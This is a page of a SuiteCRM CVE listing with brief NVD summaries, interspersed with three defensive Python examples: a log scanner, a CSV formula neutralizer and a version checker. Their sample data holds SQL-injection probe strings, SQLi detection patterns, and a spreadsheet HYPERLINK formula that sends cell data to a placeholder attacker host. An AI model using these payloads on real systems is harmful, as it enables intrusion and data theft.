SalesAgility SuiteCRM vulnerabilities
105 known vulnerabilities affecting salesagility/suitecrm.
Total CVEs: 105 | CISA KEV: 0 | Public exploits: 5 | Exploited in wild: 1
Severity breakdown: CRITICAL 21 | HIGH 43 | MEDIUM 40 | LOW 1
Vulnerabilities (page 3 of 6)
Columns: CVE (CWE) | priority | severity | CVSS | affected versions | date
CVE-2015-5948 | P3 | HIGH | CVSS 8.1 | ≤ 7.2.2 | 2017-09-06
Race condition in SuiteCRM before 7.2.3 allows remote attackers to execute arbitrary code. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-5947.
Source: nvd
CVE-2023-6131 (CWE-94) | P3 | HIGH | CVSS 8.8 | fixed in 7.12.14; v7.14.0; +3 more | 2023-11-14
Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Source: nvd
CVE-2023-6125 (CWE-94) | P3 | HIGH | CVSS 8.8 | fixed in 7.12.14; v7.14.0; +3 more | 2023-11-14
Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Source: nvd
CVE-2024-36409 (CWE-89) | P3 | HIGH | CVSS 8.8 | fixed in 7.14.4; ≥ 8.0.0, < 8.6.1; +1 more | 2024-06-10
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions prior to 7.14.4 and 8.6.1, poor input validation allows for SQL Injection in the Tree data entry point. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
Source: nvd
CVE-2024-50332 (CWE-89) | P3 | HIGH | CVSS 8.8 | fixed in 7.14.6; ≥ 8.0.0, < 8.7.1; +1 more | 2024-11-05
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Insufficient input value validation causes Blind SQL injection in DeleteRelationShip. This issue has been addressed in versions 7.14.6 and 8.7.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Source: nvd
CVE-2025-54785 (CWE-20) | P3 | HIGH | CVSS 8.8 | v7.14.6; v8.8.0 | 2025-08-07
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 7.14.6 and 8.8.0, user-supplied input is not validated/sanitized before it is passed to the unserialize function, which could lead to penetration, privilege escalation, sensitive data exposure, Denial of Service, cryptomining and ransom
Source: nvd
CVE-2024-1644 (CWE-434) | P3 | HIGH | CVSS 8.8 | v7.14.2 | 2024-02-20
SuiteCRM version 7.14.2 allows including local PHP files. This is possible because the application is vulnerable to local file inclusion (LFI).
Source: nvd
CVE-2022-45186 | P3 | HIGH | CVSS 8.1 | v7.12.7 | 2025-01-07
An issue was discovered in SuiteCRM 7.12.7. Authenticated users can recover an arbitrary field of a database.
Source: nvd
CVE-2019-14454 | P3 | CRITICAL | CVSS 9.8 | ≥ 7.10.0, < 7.10.20; ≥ 7.11.0, < 7.11.8 | 2019-10-02
SuiteCRM 7.11.x before 7.11.8 and 7.10.x before 7.10.20 are vulnerable to vertical privilege escalation.
Source: nvd
CVE-2019-13335 (CWE-918) | P3 | CRITICAL | CVSS 9.8 | ≥ 7.10.0, < 7.10.19; ≥ 7.11.0, < 7.11.7 | 2019-10-02
SalesAgility SuiteCRM 7.10.x before 7.10.19 and 7.11.x before 7.11.7 have a server-side request forgery (SSRF) vulnerability.
Source: nvd
CVE-2023-6126 (CWE-94) | P3 | CRITICAL | CVSS 9.8 | fixed in 7.12.14; v7.14.0; +3 more | 2023-11-14
Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Source: nvd
CVE-2019-25663 (CWE-89) | P3 | HIGH | CVSS 7.1 | ≤ 7.10.7 | 2026-04-05
SuiteCRM 7.10.7 contains a SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the parentTab parameter. Attackers can send GET requests to the email module with malicious parentTab values using boolean-based SQL injection techniques to extract sensitive database information.
Source: nvd
CVE-2021-45898 | P3 | CRITICAL | CVSS 9.8 | fixed in 7.12.3; ≥ 8.0.0, < 8.0.2; +1 more | 2022-01-28
SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows local file inclusion.
Source: nvd
CVE-2019-25664 (CWE-89) | P3 | HIGH | CVSS 7.1 | ≤ 7.10.7 | 2026-04-05
SuiteCRM 7.10.7 contains a time-based SQL injection vulnerability in the record parameter of the Users module DetailView action that allows authenticated attackers to manipulate database queries. Attackers can append SQL code to the record parameter in GET requests to the index.php endpoint to extract sensitive database information through time-based b
Source: nvd
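The two entries above (CVE-2019-25663 and CVE-2019-25664) both describe authenticated SQL injection through a GET parameter, which makes them detectable from ordinary web-server access logs. The following is an added example, not code from this page or from SuiteCRM: it decodes each request's query string once and flags parameter values carrying generic boolean- or time-based SQL injection indicators, marking hits on the two parameters the advisories name (parentTab, record). The log lines are constructed, the module/action names in them are assumptions, and the indicator patterns are generic rather than any specific exploit.

```python
"""Flag SQL-injection-style payloads in SuiteCRM web-server access logs.

Added example for the CVE-2019-25663 and CVE-2019-25664 entries above, which
name the parentTab parameter of the email module and the record parameter of
the Users module DetailView action. Only those parameter names come from the
advisories; the log lines below are constructed, and the payload patterns are
generic boolean/time-based SQLi indicators rather than any specific exploit.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters singled out by the two advisories; hits on them are marked.
ADVISORY_PARAMS = {"parentTab", "record"}

# Generic SQLi indicators, matched against the URL-decoded parameter value.
SQLI_PATTERNS = {
    "time-based": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "boolean-based": re.compile(r"\b(?:and|or)\b\s+[\w'\"()]+\s*=\s*[\w'\"()]+", re.I),
    "union": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "comment": re.compile(r"--\s|/\*|#"),
}

# Combined-log-format prefix: client, identity, user, timestamp, request, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample traffic (module/action names are assumptions, not from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Apr/2026:10:00:01 +0000] "GET /index.php?module=Users&action=DetailView&record=seed_admin_id HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Apr/2026:10:00:07 +0000] "GET /index.php?module=Users&action=DetailView&record=seed_admin_id%27%20AND%20SLEEP%285%29--%20- HTTP/1.1" 200 5123 "-" "python-requests/2.31"
10.0.0.9 - - [05/Apr/2026:10:00:09 +0000] "GET /index.php?module=Emails&action=index&parentTab=Activities%27%20AND%201%3D1--%20- HTTP/1.1" 200 8711 "-" "python-requests/2.31"
10.0.0.5 - - [05/Apr/2026:10:00:12 +0000] "GET /index.php?module=Emails&action=index&parentTab=Activities HTTP/1.1" 200 8711 "-" "Mozilla/5.0"
"""


def decode_params(request_path):
    """Decode the query string exactly once.

    parse_qs already percent-decodes; decoding a second time would let
    double-encoded payloads (%2527 for a quote) slip past the patterns.
    """
    return parse_qs(urlsplit(request_path).query, keep_blank_values=True)


def classify_value(value):
    """Return the indicator names that a single decoded value matches."""
    return [name for name, pat in SQLI_PATTERNS.items() if pat.search(value)]


def scan_log(text):
    """Return one finding per (request, parameter) whose value matches an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        client, method, path, status = m.groups()
        for param, values in decode_params(path).items():
            for value in values:
                labels = classify_value(value)
                if labels:
                    findings.append({
                        "client": client, "method": method, "status": int(status),
                        "param": param, "value": value, "indicators": labels,
                        "advisory_param": param in ADVISORY_PARAMS,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "ADVISORY PARAM" if f["advisory_param"] else "other param"
        print(f"{f['client']} {f['param']}={f['value']!r} -> {', '.join(f['indicators'])} [{flag}]")
```

The patterns are deliberately loose (a value like "Sales and Marketing = Q3" would trip the boolean rule), so treat a hit as a triage lead, and pivot on the client address and the 200 status: a time-based probe that keeps returning 200 with a growing response time is the tell the CVE-2019-25664 text describes.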
CVE-2021-41597 (CWE-352) | P3 | HIGH | CVSS 8.8 | ≥ 7.10.0, < 7.10.35; ≥ 7.12, < 7.12.2 | 2022-01-12
SuiteCRM through 7.11.21 is vulnerable to CSRF, with resultant remote code execution, via the UpgradeWizard functionality, if a PHP file is included in a ZIP archive.
Source: nvd
CVE-2025-64493 (CWE-89) | P3 | MEDIUM | CVSS 6.5 | ≥ 8.6.0, < 8.9.1 | 2025-11-08
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 8.6.0 through 8.9.0, there is an authenticated, blind (time-based) SQL injection inside the appMetadata operation of the GraphQL API. This allows extraction of arbitrary data from the database, and does not require administrative acce
Source: nvd
CVE-2023-6130 (CWE-29) | P3 | HIGH | CVSS 8.8 | fixed in 7.12.14; v7.14.0; +3 more | 2023-11-14
Path Traversal: '\..\filename' in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Source: nvd
CVE-2021-25960 | P3 | HIGH | CVSS 8.0 | ≥ 7.10.29, < 7.10.32; ≥ 7.11.18, < 7.11.21 | 2021-09-29
In the SuiteCRM application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by a CSV Injection (Formula Injection) vulnerability. A low-privileged attacker can use the accounts module to inject payloads into the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload gets executed. Th
Source: nvd
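The CVE-2021-25960 entry above is the classic CSV/formula injection chain: a low-privileged user stores a cell beginning with a formula trigger, and an administrator's spreadsheet evaluates it on open. The fix belongs in the export path. The following is an added example, not SuiteCRM's export code: it neutralizes any cell that a spreadsheet would read as a formula (leading =, +, -, @, tab, CR, LF) while leaving signed numbers alone, and relies on the CSV writer's own quoting so embedded quotes and delimiters cannot break out of the cell. The account records are constructed.

```python
"""Neutralize spreadsheet formula injection before a CSV export.

Added example for the CVE-2021-25960 entry above (formula injection through
account fields that an administrator later exports and opens as CSV). This is
a generic defensive routine, not SuiteCRM's export code; the records below
are constructed.
"""
import csv
import io

# A cell that begins with one of these is evaluated as a formula, or breaks the
# row layout, when the CSV is opened in common spreadsheet applications.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def is_formula_like(value):
    """True if a cell would be interpreted as a formula rather than text.

    Signed numbers ("-250.00", "+15550100") are exempt: they start with a
    trigger but are ordinary data, and prefixing them would corrupt numeric
    columns. Anything else starting with a trigger is treated as hostile.
    """
    if not isinstance(value, str) or not value.startswith(FORMULA_TRIGGERS):
        return False
    if value[0] in "+-":
        try:
            float(value[1:])
            return False
        except ValueError:
            pass
    return True


def neutralize_cell(value):
    """Prefix a formula-like cell with a single quote so it is read as text."""
    return "'" + value if is_formula_like(value) else value


def export_csv(rows, fieldnames):
    """Write dict rows to a CSV string with every cell neutralized.

    csv.DictWriter still performs the RFC 4180 quoting, so embedded quotes
    and commas in a payload stay inside their cell.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k, "")) for k in fieldnames})
    return buf.getvalue()


def parse_csv(text):
    """Read a CSV string back into a list of rows (used to verify the export)."""
    return list(csv.reader(io.StringIO(text)))


# Constructed account records: the first name field carries a formula payload,
# the second phone field a function-call style payload.
SAMPLE_ACCOUNTS = [
    {"name": '=HYPERLINK("http://attacker.invalid/?x="&A1,"Open")',
     "phone": "+15550100", "balance": "-250.00"},
    {"name": "Acme Corp", "phone": "@SUM(1,1)", "balance": "1200"},
]
FIELDS = ["name", "phone", "balance"]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ACCOUNTS, FIELDS))
```

Two caveats a reviewer would raise: the leading apostrophe stays visible in some spreadsheet importers, which is the price of a format-agnostic defence; and the numeric exemption means a value like "+1 555 0100" (spaces, so not a float) still gets prefixed, so decide per column whether strict or lenient handling fits the data.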
CVE-2020-8801 (CWE-502) | P3 | HIGH | CVSS 7.2 | ≤ 7.11.11 | 2020-02-13
SuiteCRM through 7.11.11 allows PHAR Deserialization.
Source: nvd
CVE-2024-49774 (CWE-20) | P3 | HIGH | CVSS 7.2 | fixed in 7.14.6; ≥ 8.0.0, < 8.7.1 | 2024-11-05
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. SuiteCRM relies on a blacklist of functions/methods to prevent installation of malicious MLPs, but these checks can be bypassed with some syntax constructions. SuiteCRM uses token_get_all to parse PHP scripts and check the resulting AST against bla
Source: nvd
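The affected-version column on this page mixes explicit bounds ("≥ 7.10.0, < 7.10.20"), upper bounds ("≤ 7.11.11") and bare "fixed in X" labels, and several CVEs span two release lines. The following is an added example, not part of this page or of SuiteCRM, that parses that bound notation and reports which of the entries on this page apply to an installed version string. The table is transcribed from the entries above; where an entry states only "before X" or "fixed in X" for the 7.x line, it is encoded here as "< X" on the assumption that every earlier 7.x release is affected, and the multi-branch "prior to 7.14.2, 7.12.14, 8.4.2" entries (CVE-2023-6125/6126/6130/6131) and the "+N more" ranges not shown on the page are left out.

```python
"""Check an installed SuiteCRM version against the affected ranges listed above.

Added example; not part of this page or of SuiteCRM. The range strings are
transcribed from the entries on this page. Explicit ≥/≤/< bounds are copied
verbatim; a bare "before X" / "fixed in X" for the 7.x line is encoded as
"< X" (assumption: all earlier 7.x releases are affected). Entries whose
ranges are only partly shown ("+N more") or that need a branch-by-branch
reading are omitted rather than guessed.
"""
import re

# CVE -> alternative ranges; an install is affected if ANY range matches.
AFFECTED = {
    "CVE-2015-5948": ["≤ 7.2.2"],
    "CVE-2019-14454": ["≥ 7.10.0, < 7.10.20", "≥ 7.11.0, < 7.11.8"],
    "CVE-2019-13335": ["≥ 7.10.0, < 7.10.19", "≥ 7.11.0, < 7.11.7"],
    "CVE-2019-25663": ["≤ 7.10.7"],
    "CVE-2019-25664": ["≤ 7.10.7"],
    "CVE-2020-8801": ["≤ 7.11.11"],
    "CVE-2021-25960": ["≥ 7.10.29, < 7.10.32", "≥ 7.11.18, < 7.11.21"],
    "CVE-2021-41597": ["≥ 7.10.0, < 7.10.35", "≥ 7.12, < 7.12.2"],
    "CVE-2021-45898": ["< 7.12.3", "≥ 8.0.0, < 8.0.2"],
    "CVE-2024-36409": ["< 7.14.4", "≥ 8.0.0, < 8.6.1"],
    "CVE-2024-50332": ["< 7.14.6", "≥ 8.0.0, < 8.7.1"],
    "CVE-2024-49774": ["< 7.14.6", "≥ 8.0.0, < 8.7.1"],
    "CVE-2025-64493": ["≥ 8.6.0, < 8.9.1"],
}

# One bound: an operator (Unicode or ASCII form) followed by a dotted version.
BOUND_RE = re.compile(r"^(≥|>=|≤|<=|<|>)\s*(\d+(?:\.\d+)*)$")


def parse_version(text):
    """'7.10.20' -> (7, 10, 20); a trailing tag such as '-beta' is ignored."""
    nums = re.findall(r"\d+", text.split("-")[0])
    if not nums:
        raise ValueError(f"not a version: {text!r}")
    return tuple(int(n) for n in nums)


def cmp_versions(a, b):
    """Three-way compare of version tuples, padding the shorter one with zeros
    so that 7.12 == 7.12.0 and 7.12 < 7.12.2."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def in_range(version, range_text):
    """True if `version` satisfies every comma-separated bound in range_text."""
    v = parse_version(version)
    for bound in range_text.split(","):
        m = BOUND_RE.match(bound.strip())
        if not m:
            raise ValueError(f"unparsable bound: {bound!r}")
        op, target = m.group(1), parse_version(m.group(2))
        c = cmp_versions(v, target)
        holds = {"≥": c >= 0, ">=": c >= 0, "≤": c <= 0, "<=": c <= 0,
                 "<": c < 0, ">": c > 0}[op]
        if not holds:
            return False
    return True


def affected_cves(version, table=AFFECTED):
    """Sorted list of CVE IDs from `table` whose ranges include `version`."""
    return sorted(cve for cve, ranges in table.items()
                  if any(in_range(version, r) for r in ranges))


if __name__ == "__main__":
    for installed in ("7.10.7", "7.14.6", "8.7.1", "8.9.1"):
        hits = affected_cves(installed)
        print(f"{installed}: {len(hits)} matching entries on this page", *hits, sep="\n  ")
```

A clean result only says that none of the encoded ranges on this page match; it is not a clean bill of health for the install, since the omitted entries and the other five pages of this listing still have to be checked.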